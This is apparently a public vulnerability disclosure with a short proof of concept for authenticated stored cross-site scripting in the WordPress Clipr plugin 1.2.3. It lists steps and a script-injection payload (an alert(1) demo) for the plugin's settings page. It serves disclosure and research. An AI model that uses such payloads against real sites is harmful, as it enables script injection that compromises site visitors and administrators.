WordPress Clipr plugin version 1.2.3 suffers from a cross site scripting vulnerability.
d1b537531b93739457721e8e0d5443a1
# Exploit Title: WordPress plugin clipr version 1.2.3 - ( Authenticated )
# Date: 29-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/clipr/
<https://wordpress.org/plugins/amministrazione-aperta/>
# Version: 1.2.3
# Tested on: Firefox
# Contact me: h [at] spidersilk.com
# POC
- Install Plugin https://wordpress.org/plugins/clipr/
- Navigate to the settings page pf the plugin:
http://localhost:10003/wp-admin/options-general.php?page=clipr
- Inject paylaod `asdasd'></script><script>alert(1)</script>`
- Navigate to the main page of the WordPress URL
`http://localhost:10003/` <http://localhost:10003/>
- Malicious Javascript payload will execute.